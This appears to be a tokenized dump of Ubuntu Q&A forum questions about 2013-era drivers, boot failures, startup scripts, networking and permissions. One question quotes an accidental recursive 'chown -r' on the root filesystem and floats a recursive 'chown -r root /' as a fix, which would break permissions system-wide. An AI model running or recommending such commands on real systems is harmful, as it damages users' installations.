n't have a cd/dvd drive , because the laptop is an ultrabook ; i do n't have linux installed on the drive any more ( because as i said above , i deleted the partitions ) . what can i do ? in some days i have an university exam and i need to get to my documents as soon as i can..
364374	remapping shift key and bash script startup problem	my keyboard both shift key malfunctioned , my os is ubuntu 13.04 . so i am using one of the control key as shift key . i did this using xkeycaps tool , and that 's working fine and i need to do this command from terminal every time i login . xkeycaps auto-create a script xmod.sh of remapping keyboard keys . i do this command after startup : xmodmap ~/.xmodmap-`uname -n` so , i write a bash command at init.d and also sets up permission to startup at login . though its not working . i had to manually enter the command in terminal all the time . my bash script is there : sudo cat /etc/init.d/xmod.sh permission to startup : sudo chmod +x /etc/init.d/xmod.sh updating init.d : sudo update-rc.d xmod.sh defaults and xmod.sh contains : # ! bin/bash xmodmap ~/.xmodmap-`uname -n` please experts tell me what am i missing .
364375	problem with bcm43xx / b43 / b43legacy blacklisted /var/log/jockey.log	i have installed ubuntu 12.04 64bit version and i was new to drivers issues and my wireless lan wo n't activate from additional drivers and i was reported that i have to check /var/log/jockey.log i got these lines 2013-10-23 15:21:11,733 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2013-10-23 15:21:11,802 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2013-10-23 15:21:11,822 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2013-10-23 15:21:16,969 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2013-10-23 15:21:19,748 warning : modinfo for module wl failed : error : modinfo : could not find module wl 2013-10-23 15:21:19,749 warning : /sys/module/wl/drivers does not exist , can not rebind wl driver 2013-10-23 15:21:19,806 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted so - how do i fix this issue ?
364377	bluetooth adapter not found in `` hp pavilion 15-e006tu notebook ''	i have installed `` ubuntu 12.04 lts '' on hp pavilion 15-e006tu notebook but bluetooth adapter is not working . what should i do to enable bluetooth on my laptop ?
364383	is unity available for pcs running old unsupported versions such as v9.10	my clients keep asking me to use unity in their old version '' ubuntu '' pcs so is it available in old version also ? if yes , how ? if no , why ?
364385	how to install xampp on other drive then /opt/	how can i install xampp in other linux drive ? not the default /opt/ which is i guess ubuntu 's os drive folder . like i do in windows , i have c drive for windows and d drive for xampp . so in case i mess up os , i have my database and htdocs safe . i have searched google but not able to found how to install the complete xampp on other partition . i know we can change the htdocs folder and set the path in httdp.conf file , but i also want to save the database folder in my xampp based drive . please guide thanks
364386	error in apt-get install -f after trying cups manual installation	i 've tried to install a newer version of cups 1.6.4 in my ubuntu 12.04 i 've screw up installing it over version 1.5.4 ( .configure/make/sudo make install ) then i 've unistalled it with sudo make uninstall now if i tried anything with apt-get i obtain an error , eg : sudo apt-get -f install sudo apt-get install -f lettura elenco dei pacchetti ... fatto generazione albero delle dipendenze lettura informazioni sullo stato ... fatto correzione delle dipendenze ... fatto i seguenti pacchetti saranno inoltre installati : cups pacchetti suggeriti : cups-bsd printer-driver-hpcups hplip i seguenti pacchetti nuovi saranno installati : cups 0 aggiornati , 1 installati , 0 da rimuovere e 19 non aggiornati . 2 non completamente installati o rimossi . ă necessario scaricare 0 b/1299 kb di archivi . dopo quest'operazione , verranno occupati 4294 kb di spazio su disco . continuare [ s/n ] ? s preconfigurazione dei pacchetti in corso ( lettura del database ... 263030 file e directory attualmente installati . ) estrazione di cups ( da ... /cups_1.5.3-0ubuntu8_amd64.deb ) ... update-rc.d : /etc/init.d/cups exists during rc.d purge ( use -f to force ) dpkg : errore nell'elaborare /var/cache/apt/archives/cups_1.5.3-0ubuntu8_amd64.deb ( -- unpack ) : il sottoprocesso nuovo script pre-installation ha restituito lo stato di errore 1 si sono verificati degli errori nell'elaborazione : /var/cache/apt/archives/cups_1.5.3-0ubuntu8_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) how can i solve this problem ? thanks a lot , willy [ update ] : it seems i 've solved by deleting /etc/init.d/cups then sudo apt-get -f install
364388	how to set screenshot format to jpg ?	i am wondering how can i change default screenshots to jpg , specially for mplayer where default shots are in png which renders the images too large .
364389	copy wireless configuration between clients	we have a group of kiosk-type machines that we are configuring and we would like to have wireless as an option as some of the locations do not have the luxury of an ethernet wall jack . we are using puppet to push out configurations . i am wondering how to copy a wireless configuration to all of the clients from the puppet master . the configuration file i am currently working with is the /etc/networkmanager/system-connections/wireless file . there are a couple of unique items in this file such as the uuid and the mac address . i have an idea as to how to get the mac address but the uuid is giving me some problems . is there a way to have a configuration without a uuid or a way to get it and parse it into the config ? thanks .
364391	safest non default kernel to use ?	i want to use a newer kernel for my ubuntu 12.04 system ( 32 ) . of course , i can download the latest that is for my 12.04 from , here http : //kernel.ubuntu.com/~kernel-ppa/mainline/ , but is it safe and wise to use one of the kernels here which bear the name of a newer version quantal and above . i want to use the latest stable - 3.11 as of this moment i want to try newer kernel because i have some problems with chrome and firefox rendering google maps the newer version , and on of the possible solutions proposed were newer drivers in newer kernels
364394	xrandr startup script	i 'm using ubuntu server with xmonad . i configure my dual monitor setup with xrandr but i ca n't get it to run on startup . my .xinitrc looks like this : # wm xmonad # dual monitor xrandr -- output hdmi1 -- auto xrandr -- output vga1 -- auto -- left-of hdmi1 the settings are not being applied . how should i go about this ?
364395	how to get my macbook 2008 trackpad working ?	my macbook 2008 trackpad wo n't work under ubuntu 12.04 . it happened 2 min after i had logged in , the mouse stopped working . what can i do ?
364401	ubuntu 12.04 lts wifi icon issue	first off , this is not my first rodeo on ubuntu , but this problem has been plaguing me forever now and i can not figure it out . this link will take you to the problem i am having . https : //docs.google.com/file/d/0b5_vwpt9rjplsg1lsfrbewt6nk0/edit ? usp=drive_web the problem is that i am completely connected to my wireless network although , ubuntu is not showing any bars what-so-ever on the wireless icon . now the only thing that i have done to fix it is to upgrade to the next distribution version , which is ubuntu 12.10 quantal quetzel , i do not like doing that because it would seen that every time i do that , but anyway that is getting off on to a tangent . i was hoping someone on this site would be able to help me with solving this problem . short of upgrading the entire system . many thanks for your help in advance , its not like this is causing system wide errors or anything , it is just part of the aesthetic of ubuntu , and i would like to get it back and working .
364402	struggling with commands in xterm	i am absolutely struggling with the cp command and the moment and i would like to know where to just learn all the usefull commands . like cp has to start at /home right ? i also hate that i cant just manually copy the file to /var/www any help in making it easier for me ? my options are : learning the commands till i can dream about it or just easily do everything like windows , like copying etc .
364404	e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ?	i am using ubuntu 13.10 on evaluation board and my internet is not working . also i need to install softwares and apt-get install is also not working . terminal says : e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? source : http : //www.howtoforge.com/installing-apache2-with-php5-and-mysql-support-on-ubuntu-13.04-lamp
364409	instaltion crashed due to grub2 is not loading ... .please help me to solve this	my name is bharat i have a problem with `` grub '' .initially i installed ubuntu 13.04 64 bit along with windows 8 in my lenovo laptop.and later i came to know that it is not supportive for the programs im using and my friend told me to try ubuntu 12.04 64 bit version.so , i tried to uninstall ubuntu 13.04 and after uninstalling this `` grub '' is still their and it is showing `` ubuntu `` in boot loader menu . and it is not deleteing and later any way i tried to install ubuntu 12.04 but after partitioning it is showing that `` grub2 is not working and unable to install ubuntu '' and its instalation is stoped ... .please help to solve this problem and i want to install ubuntu 12.04 now what to d0.. ? ? ? ? ?
364411	can this computer run ubuntu ?	i 've been using windows for ages on my computer . i would like to upgrade to ubuntu by replacing my windows . i 'm not sure whether my computer can run 13.10 . my specs are below : system : microsoft windows xp professional version 2002 service pack 2 computer : intel ( r ) celeron ( r ) cpu 2.53 ghz 2.53 ghz , 1 gb of ram display adapter : intel ( r ) 82845g/gl/ge/pe/gv graphics controller v.6.14.10.4342 i have some 3 gb of virtual memory too .
364414	xsession scripts not getting loaded . i need my a script to run on startup	.xsession , .xprofile , .xinitrc , .xsessionrc ... none of these are getting loaded . what is the proper way to get session scripts to work ? i 've looked around and none of those filenames work on my system ( as of my upgrade to 13.10 ) . permissions on those files are 777 so there 's no problem there . i need to run xmodmap ~/.xmodmap on session startup .
364415	is there a command-line program to read tags from .m4a files ?	running id3v2 -l file.m4a did n't find any tags , but displaying it in rhythmbox did . is there another command-line program for working with tags that works on .m4a files ? i 'm running precise 12.04 . note : see wikipedia 's page for .m4a , .mp4 , mpeg-4 part 14 file format background , and note that as discussed at spec for mp4 and m4a tags - hydrogenaudio forums , apple considers the tags used by itunes to be proprietary ; hence there is no official spec for them available . damn !
364417	trouble installing vlc	whenever i try to install vlc by terminal this shows up . ankit @ ankit-desktop : ~ $ sudo apt-get install vlc [ sudo ] password for ankit : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : vlc : depends : vlc-nox ( = 2.0.8+git20131023+r618-0~r13~ubuntu13.10.1 ) but it is not going to be installed recommends : vlc-plugin-notify ( = 2.0.8+git20131023+r618-0~r13~ubuntu13.10.1 ) but it is not going to be installed recommends : vlc-plugin-pulse ( = 2.0.8+git20131023+r618-0~r13~ubuntu13.10.1 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . i 'm using ubuntu 13.10 . please tell me what to do ? when i try to install vlc from software center , this message pops up , package dependencies can not be resolved .
364421	about strange cache usage on ubuntu13.10	ok , i have just installed ubuntu 13.10 , and likes its cool , however , it also make me surprised that when i download files from internet by using the scp or wget or firefox download , the cache usage grows quickly . when the system starts up , the memory usage is about 900m , then , after downloading files , the usage is about 2.1g , and i must call sync & & echo 1 > /proc/sys/vm/drop_caches to release the caches . i 'm wondering whether there is any problems on ubuntu13.10 ? thx !
364424	super+d key shortcut does not show desktop	i recently installed saucy salamander on my computer . previously in ringtail , super+d used to show the desktop . however for this release , the super+d does not seem to work properly ... is it a bug ?
364426	this location could not be displayed you do not the permissions necessary to view the contents of www	i cant acces /var/www all of the sudden ... also i would like to just give the user `` loko '' all the permissions . how can i get the error i am getting all of the sudden and how to fix it ? yesterday it worked fine .
364427	my microsoft wireless mobile mouse 4000 isnt working	i bought a new mouse and it was working fine for a while . but now every time i put the wireless usb device in any of my laptops it sais that it doesnt recognise the usb device . i havent passed by a technician yet hoping this might help .
364436	ubuntu 12.04 boot problem	accidentally when i go over the `` sudo apt-get autoremove '' command i ended up with the boot problem in ubuntu 12.04 . when i try to enter with both normal and recovery options , it returns a black screen with a blinking cursor at the top . besides , i try to install ubuntu-desktop entering to a command line via ctrl+alt+f1 option , but the connection is failed either . ( even though the nw cable is plugged and all ) specification : ubuntu 12.04 ( x64 ) i messed up big time . any suggestion ? ? ? ? thanks in advance .
364437	ca n't reliably create a directory on startup after ec2 instance mounts it 's ephemeral drives	this particular instance type mounts two ephemeral drives , in /dev/ and /mnt/ . i have to create working directories for one of my services in these paths at startup or the services wo n't launch . sometimes this script below works , sometimes it does not . i suspect it 's a race between the folder being mounted , and my rc.local script kicking off . is there a more reliable place i can create these directories ? the last time i booted up , the /mnt/mongodb dir did get created , but the /dev/ one did not . i 'm running the 12.04 hvm ubuntu instance from amazon . here is my rc.local file : cd /mnt/ sudo mkdir mongodb sudo chown -r mongodb mongodb sudo chgrp -r mongodb mongodb cd /dev/ sudo mkdir mongodb sudo chown -r mongodb mongodb sudo chgrp -r mongodb mongodb sudo service mongodb start exit 0
364438	bumblebee with nvidia 540m 12.04 ( acer aspire 5755g )	ive been really struggling to get my nvidia card working with bumblebee . currently when i run optirun glxspeheres i get the following . [ 138.520664 ] [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) no devices detected . [ 138.520772 ] [ error ] aborting because fallback start is disabled . ive tried a number of things that have been mentioned on here , the latest being the installation of the nvidia-319 ( although this seemed to install nvidia-331 confusingly ) and then the re-configuration of bumblebee . my /etc/bumblebee/bumblebee.conf is as follows [ bumblebeed ] virtualdisplay=:8 keepunusedxserver=false servergroup=bumblebee turncardoffatexit=false noecomodeoverride=false driver=nvidia xorgconfdir=/etc/bumblebee/xorg.conf.d [ optirun ] bridge=auto vgltransport=proxy primuslibrarypath=/usr/lib/x86_64-linux-gnu/primus : /usr/lib/i386-linux-gnu/primus allowfallbacktoigc=false [ driver-nvidia ] kerneldriver=nvidia-331 pmmethod=auto librarypath=/usr/lib/nvidia-331 : /usr/lib32/nvidia-331 xorgmodulepath=/usr/lib/nvidia-331/xorg , /usr/lib/xorg/modules xorgconffile=/etc/bumblebee/xorg.conf.nvidia # # section with nouveau driver specific options , only parsed if driver=nouveau [ driver-nouveau ] kerneldriver=nouveau pmmethod=auto xorgconffile=/etc/bumblebee/xorg.conf.nouveau can someone please give me a clue as to what to do to get this working . i 'll happily post logs or command output if someone can let me know what would be useful . many thanks mark
364439	ca n't launch applications after a while under gnome fallback	i use gnome-fallback under ubuntu 13.10 ( but it was also the case in 13.04 ) . after some time , without any action , i ca n't launch any new applications . the old ones continue to work normally , but i just ca n't launch anything . any ideas ? best ,
364440	full ubuntu load from usb without overwriting windows in hard drive ?	i want to keep the full ubuntu on a usb while being able to load windows . though there 's a trial version i want the full on a usb stick so i can use it at work and school .
364441	ubuntu ca n't find my sound card	when i open sound settings is says dummy output . i do n't think ubuntu can find my card . it is build in my motherboard , i think here is my sound card specs : 00:1b.0 audio device : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) high definition audio controller ( rev 03 ) subsystem : aopen inc. device 0501 flags : bus master , fast devsel , latency 0 , irq 42 memory at d02c0000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel kernel modules : snd-hda-intel
364445	disable the new keyboard applet in ubuntu 13.10	a new keyboard applet is enabled by default in ubuntu 13.10 . i want to disable it and i did n't find any settings to do it . can anyone give me some ideas ?
364448	mac osx update broke booting ubuntu	i have a mac that is running a dual boot with osx and ubuntu . i am using refit . i just updated my osx to the new osx mavericks , but when i restarted my computer and tried to enter ubuntu from refit i just got an error message saying error : unknown filesystem . how can i solve this ? where is the problem , is it grub or refit ?
364450	how to access ubuntone when it asks for default keyring which has never been set ?	i am trying to set up ubuntuone on a new computer and after i enter the email and password , it asks for the keyring 'default ' . i do n't know what it is and i never set it . makes it difficult to enter so it seems to be a counterproductive security default . i understand that if autologin is set the keyring is called . i tried setting the main user to need a password but if i reboot it does n't ask for the password so it sort of autoboots still . so how do i set the keyring default password ? if i ca n't set it i ca n't install ubuntone
364451	play rmvb on ubuntu saucy 13.10	i have used to play rmvb on totem at ubuntu quantal and raring after updating to saucy and installing restricted extras it give message about additional plug-in needed and it play only sound . any idea ? ?
364455	ubuntu crashed while 13.10 was installing and now it does n't detect my keyboard when i boot	i was running the 13.04 to 13.10 installer , and it slowly caused ubuntu to break down until eventually the installer itself along with unity crashed , forcing me to alt+sysrq+b . now , when i try to start ubuntu it does n't detect my keyboard at all . it boots up completely fine apart from that bringing me to the 13.10 login screen . the backlight on my keyboard remains on but not a single thing works , not even sysrq . i was imagining that if i could run apt-get dist-upgrade it could finish the update , but i could n't get that far .
364458	running gui app with php	i want to run chronium and avconv from a page of my website . how can i make www-data user/group able to launch x11 applications ? thanks very much . edit : i am now able to start chronium , i have changed user and group to my own ones . still ca n't use avconv , the string i use to try to record is this : avconv -f x11grab -show_region 1 -video_size 1024x768 -framerate 24 -i :0.0 -threads 2 -q 1 -bt 8000000 -b 8500000 /home/alessandro/condivisa/video.mkv
364461	how can i get a dell latitude d620 to connect wirelessly on the internet in lubuntu 13.10	my school has laptops and i was asked to install a linux distro on them . i put lubuntu on them , but i noticed the os does n't even know the laptops can connect wirelessly to the internet . i noticed on the side of the laptop there is a switch which controlled the wireless internet connection , it can reset or turn off wi-fi . my theory is that lubuntu does not know how to control that switch and it does n't know it is even there . is this problem caused by that switch ? how can i fix this problem ? i do n't want the school to throw away these laptops , they are the newest set of laptops they have and they ca n't afford any more for a long time . thanks
364463	ubuntu 13.10 issues with amd driver & audio	i am on ubuntu 13.10 , my graphics card is amd radeon hd4200 . my sound card is a realtek hdmi . i 've tried downloading and installing both drivers but nothing works . graphics card : when i run the .run file ( from http : //www2.ati.com/drivers/legacy/amd-driver-installer-catalyst-13.1-legacy-linux-x86.x86_64.zip ) i get an error . i check the fglrx-install log and it says this : check if system has the tools required for installation . fglrx installation requires that the system have kernel headers . /lib/modules/3.11.0-12-generic/build/include/linux/version.h can not be found on this system . one or more tools required for installation can not be found on the system . install the required tools before installing the fglrx driver . optionally , run the installer with -- force option to install without the tools . forcing install will disable amd hardware acceleration and may make your system unstable . not recommended . audio : since my first install i 've had no audio . i 've tried everything outlined in this site : http : //itsfoss.com/fix-sound-ubuntu-1304-quick-tip/ to no avail . i 've download the linux drivers from realtek hdmi audio but have had no luck .
364469	is there a log of errors produced during an upgrade ?	at the end of an upgrade from 12.10 to 13.04 , i received an error message something to this effect : some programs could not be installed . you will have to reinstall them after reboot . my question : is there a log produced during the upgrade that i could see to tell me what these programs that failed installation were ? update : $ ls -al /var/log/dist-upgrade total 8 drwxr-xr-x 2 root root 4096 apr 19 2013 . drwxr-xr-x 15 root root 4096 oct 23 08:12 .. $ sigh
364472	ubuntu touch on archos tablet ?	i have an archos 97 carbon , and am interested in putting ubuntu touch on it . i wonder if this is possible ? or where to begin ?
364476	unwanted systray icons	is there any way to manage the icons in your systray ? it 's not highly important , but it annoys me having icons there that i do n't want or use . it seems a little strange that it 's so easy to customise just about everything else , but i ca n't for the life of me find a way to edit the systray . maybe i 'm just missing something ? if there are specific ways of getting rid of each one , the i 'd like to remove the ubuntu one icon , the mail icon , and possibly the icon that says en1 , and allows you to choose between uk and us english , unless that is important and i have n't realised it . i 'm using ubuntu 13.10 .
364477	juju bootstrap error no default environment found	everytime i type juju bootstrap .error no default environment found keeps showing up . i was trying to configure maas . this is my environments.yaml juju : environments environments : maas : type : maas maas-server : 'http : // { my ip address } :80/maas' maas-oauth : 'c2cg7htpzfurmjjrbc : yh2zexvrkl46ttadmq : bekebjhygwyxkk2gqqwacx97xnmp4lju' admin-secret : 'nothing' default-series : 'precise'
364481	terminal/putty showing control characters ( ^m ) after updating	i updated my system yesterday afternoon using the recommended updates from update manager . after it completed , i shutdown my system and went home for the day . i come in this morning and i am getting control characters displayed when using vi in both the standard terminal emulator , putty , and putty inside of my windows virtual that i run with virtualbox . i have made no other system changes and i can not figure out how this occurred . it 's as if every text file i have was created in dos . i 've searched the forums and i have n't found any answers . i am using xterm as my emulator and i checked with 3 of my coworkers and none of them are having this problem so we do not believe it is a server side issue . especially since i 've checked 3 different servers . there 's nothing in my .profile other than path variables so i 'm using the same terminal settings as everyone else . some files are fine ( i can open and read both /etc/environment and my .profile ) but most of any kind of server generated log file is trash . running cat or head on the same file displays the contents without the characters .
364482	how to change the uid of a user with an encrypted home directory	how can i change the uid of a user with an encrypted home directory ?
364485	move data from others user accounts in my user account	i had problems with compiz setting and i make multiple accounts , now i want to transfer my information from all deleted users in my current account , some data i can not copy because i am not right to read , i type in terminal `` sudo nautilus '' and i get the permission for read , but the copied data is available only for superusers and i must charge the permissions for each file and each folder . how i can copy the information with out the superuser rights or how i can charge the permissions for selected folder and all files and folders included in it ?
364487	i can not seem to install wubi on windows 8.1 pro ( surface pro 2 )	i just bought surface pro 2 ( with windows 8.1 pro ) from the store yesterday and tried installing wubi ( right before them ) and ran into some boot up issues . luckily i was able to enter windows again and uninstall it . anyone who can help me with this . thanks in advance
364495	problem with kernel - kernel panic not syncing fatal exception in interrupt	i 'm a big fan of ubuntu and i never had any problems , and even if i had , everything is fixable ... so here 's what 's going on . 2 weeks ago i installed ubuntu 12.04 lts on my dell inspiron 1564 , which has a broadcom wifi driver . it was not working , so i activated it from the additional drivers and updated my kernel too ! it is working now , but i get this type of error with a black screen of death kernel panic - not syncing : fatal exception in interrupt drm_kms_helper : : panic occurred , switching back to text console anyone knows how to fix this ? so right now i 'm connected to the internet using external wifi adapter , and i did n't get any crash ( yet )
364496	wake on lan ( wol ) for realtek rtl8101e/rtl8102e	i 'm unsuccessfully trying to get wake on lan to work with my local server ( ip address : 192.168.0.2 , distro ubuntu 12.04.3 lts ) which has a realtek rtl8101e/rtl8102e ethernet card . the computer sending the wol is a macbook pro which is connected on the same network . yet the server fails to start . here what i have done so far : name @ servername ~ $ cat /proc/acpi/wakeup device s-state status sysfs node hdef s3 *disabled pci:0000:00:1b.0 pxsx s3 *disabled pxsx s0 *enabled pci:0000:04:00.0 pxsx s0 *disabled usb1 s3 *enabled pci:0000:00:1d.0 usb2 s3 *enabled pci:0000:00:1d.1 usb3 s3 *enabled pci:0000:00:1d.2 usb5 s3 *enabled pci:0000:00:1a.1 ehc1 s3 *enabled pci:0000:00:1d.7 ehc2 s3 *enabled pci:0000:00:1a.7 name @ servername ~ $ lspci -- -- -- 04:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 01 ) -- -- -- name @ servername ~ $ sudo ethtool eth0 settings for eth0 : supported ports : [ tp mii ] supported link modes : 10baset/half 10baset/full 100baset/half 100baset/full supported pause frame use : no supports auto-negotiation : yes advertised link modes : 10baset/half 10baset/full 100baset/half 100baset/full advertised pause frame use : symmetric receive-only advertised auto-negotiation : yes link partner advertised link modes : 10baset/half 10baset/full 100baset/half 100baset/full link partner advertised pause frame use : symmetric receive-only link partner advertised auto-negotiation : yes speed : 100mb/s duplex : full port : mii phyad : 0 transceiver : internal auto-negotiation : on supports wake-on : pumbg wake-on : g current message level : 0x00000033 ( 51 ) drv probe ifdown ifup link detected : yes and i 'm calling the wol with : name @ servername ~ $ wakeonlan xx : xx : xx : xx : xx` sending magic packet to 255.255.255.255:9 with xx : xx : xx : xx : xx i have succesfully activated the wol option in my computer bios . any idea ?
364497	ca n't access some websites using ubuntu 13.10	something 's wrong with ubuntu . since i 've upgraded to 13.10 , i ca n't access some websites for no apparent reason . i 've tried everything imaginable to solve this problem : made sure that mtus are the same , disabled ipv6 in both the network manager and used browsers , deactivated my network keys , dmzed my computer , used other dns like google and opendns , checked that no firewall was running my computer ... and it 's the same result . i even tried to reinstall ubuntu a couple of times , but no luck . the most annoying thing about it is i ca n't access wordpress.org ! so , there 's no way it could be an isp restriction of some kind . when i use a vpn , i can access pretty much anything . i 'm really frustrated because i have to use wordpress.org very often . any clue ? ifconfig adame @ adame-ws : ~ $ ifconfig eth0 link encap : ethernet hwaddr 00:26:18:3d : b0:7c inet addr:10.42.0.1 bcast:10.42.0.255 mask:255.255.255.0 inet6 addr : fe80 : :226:18ff : fe3d : b07c/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:8024 errors:0 dropped:0 overruns:0 frame:0 tx packets:7966 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:684480 ( 684.4 kb ) tx bytes:616608 ( 616.6 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:8222 errors:0 dropped:0 overruns:0 frame:0 tx packets:8222 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:568269 ( 568.2 kb ) tx bytes:568269 ( 568.2 kb ) wlan0 link encap : ethernet hwaddr 00:19:70:40:85 : eb inet addr:192.168.2.3 bcast:192.168.2.255 mask:255.255.255.0 inet6 addr : fe80 : :219:70ff : fe40:85eb/64 scope : link up broadcast running multicast mtu:1464 metric:1 rx packets:123705 errors:0 dropped:0 overruns:0 frame:0 tx packets:98141 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:94963545 ( 94.9 mb ) tx bytes:10387470 ( 10.3 mb ) /etc/hosts 127.0.0.1 localhost 127.0.1.1 adame-ws : :1 ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters tracepath wordpress.org 1 : adame-ws.local 0.092ms pmtu 1500 1 : 192.168.2.1 1.300ms asymm 2 1 : 192.168.2.1 1.060ms asymm 2 2 : no reply 3 : no reply 4 : no reply 5 : no reply 6 : no reply 7 : no reply 8 : no reply ... keep on going like that ping wordpress.org adame @ adame-ws : ~ $ ping wordpress.org ping wordpress.org ( 66.155.40.250 ) 56 ( 84 ) bytes of data . -- - wordpress.org ping statistics -- - 10 packets transmitted , 0 received , 100 % packet loss , time 9071ms
364501	file permissions are d ?	i was backing up my system , and got a permission denied message on the file /var/lib/lightdm/.gvfs . so , i go and do a ls -alrt on that directory , and the directory .gvfs has permissions of `` d ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? '' . in other words even the file owner , size , date are also a question mark . as root , i have no permissions to chmod or chown it . can someone help me understand what it means and how to resolve it ? thanks .
364502	set up nvidia drivers on imac 21.5 ( ubuntu 13.10 )	i am new to imacs . i have set up dual boot on my new machine , ubuntu 13.10 loads fine . though , i clearly see that there are problems with graphics drivers . i have tried to follow some instructions found online , but this lead me to the reinstall of a system . does anybody know how to properly set up graphics on modern macs ? in case this is important , the graphics card used is geforce 750m .
364504	is it possible migrate existing programs installed in windows ?	can i move my already installed programs to my ubuntu installation , and if so can someone give me the general gist of it ? i 'm pretty good with a computer so if you give me the general outline i should be able to manage .
364506	back in time notifcations in 13.10	is there a way to get back in time notifications working on 13.10 ( unity ) ?
364508	wireless ubuntu 13.04	i ca n't connect wireelessly ubuntu 13.04 no matter what solution i choose . i have connection on windows though , i use dlink 160 adapter . please help
364510	at 12.04 - network manager does't support 4g modems ?	at 13.04 i can easily connect the zte 4g modem using network-manager , but when i try connect modem in 12.04 lts , it 's does n't work . in what could be the problem ?
364512	can not boot into ubuntu !	i successfully dual-booted win8 and ubuntu 13.04 . now that i have changed my windows from win8 to win 7 , i cant access my ubuntu bootloader , or option to boot into ubuntu . any help ?
364515	accidentally chown -r on /	i accidentally wrote : sudo chown -r myuser / ( i was actually trying to type `` media/myuser/my\ pen\ drive '' ) now the system does n't boot . how do i fix this ? do i just : sudo chown -r root / i 'm a linux newbie so i do n't want to mess the system up even more . : \ sudo does n't work : sudo : effective uid is not 0 , is sudo installed setuid root ?
364519	my cpu is 32 bit , but i have 3go of ram , should i take ubuntu 32 bit or 64 bit ?	because on the front page it says 32 bits is for less than 2go ...
364521	how i can install g++ 4.7.2 ?	hi i need to install g++ version 4.7.2 , but every attempt it installed the latest version 4.7.3 . how i can do to install the version 4.7.2 ? thank you . translated from spanish
364523	change profile from unity to default in compizconfig setting manager	i am using compizconfig setting manager to change the profile from unity to default , and as the result of what i did , only unity2d can work now . please help me to return my unity .
364524	shift ket displays dots in lightdm	i have my first xubuntu 1204 installed . on login my shift keys show dot in the password field . when released , everything is ok , i can use it as usual . i only have to clean the field to enter my password that begins with a capital . a bug ?
364525	ubuntu oem disk encryption	if a customer buys a computer with ubuntu oem installed in it , will they be given the option to encrypt their hard drives using luks ?
364526	is the rewrite module activated for nginx in the wordpress juju	is the rewrite module activated for nginx in the wordpress juju ? when i change the permalink to anything other than default i get bad gateway . rewrite is mandatory for buddypress to function properly . can anyone help me solve this issue ?
364529	what is the status of getting flash and chromium for ubuntu arm ?	i have ubuntu dual booting on a samsung arm chromebook but have to go back to chrome os if i want to watch a flash video or do a google hangout . is there a way to have these capabilities in ubuntu for arm now ? if not , when will we have these capabilities in ubuntu for arm ? thanks
364530	hp 655 notebook ( ubuntu 12.04 ) wireless internet disabled after running updates	today the update-manaeger suggested that i should download some updates . so i did . after the updates were installed i had to reboot the system . after the reboot my notebook does n't see any wireless networks . i was looking for a long time on the internet for answers but non of them applies to my case . i have the idea , it has got something to do with the kernel i am currently using ( linux 3.2.0-55 ) . is this one new for ubuntu 12.04 ? when i boot my system i can choose to use an older kernel ( linux 3.2.0-32 ) . when i use this one the notebook does see the wireless networks . this is my network card according to the command lspci : ralink corp. rt3290 wireless 802.11n 1t/1r pcie anyone an idea to fix my problems with wireless internet ?
364535	how can access the windows desktop from ubuntu if they are on the same hard drive ?	i do n't want just a command box , but a separate window that lets me in to windows . i 've seen it before so i know you can . tried running remmina but its not letting me connect .
364539	after ubuntu update , desktop gui not booting	i was running 12.04 , and the update manager notified me to restart to finish installing updates . i did so , and now ubuntu boots into a cli . the version is 12.04.3 . how do i start my gui desktop ? i am months new to linux fyi~ here are the things i have tried with resulting output : startx /usr/bin/x : not found ctrl+alt+f7 could not write bytes : broken pipe service lightdm restart stop : rejected send message ... ( more text ) sudo apt-get install build-essential 0 upgraded , installed , removed , and upgraded sudo apt-get install ubuntu-desktop ctrl alt f7 reports no errors , but is a blank screen . i think i am clsoe
364542	execute a shell script when usb is connected	i am working on an application which deals with all kinds of usb storage devices ( such as taking backup , updating datalogfile etc ) my problem is : i want to write a shell script which is stored in this usb drive ( as usb is at center of my project so usb is going to be same but pc 's will change ) and this script should be executed as soon as the usb drive is connected to my linux system.i will not need any kind of `` root '' or `` sudo '' permissions for other tasks which i am going to do in this shell script .
364545	windows xp professional shows blank screen after installing ubuntu 13.04	i tried to install ubuntu 13.04 as dual-boot just like the picture below . https : //www.dropbox.com/sh/v5z2af13h916b4q/9wcdnbd7lt but , after the installation is finished and i try to use windows , my monitor only shows a blank screen . please help me how to fix it ...
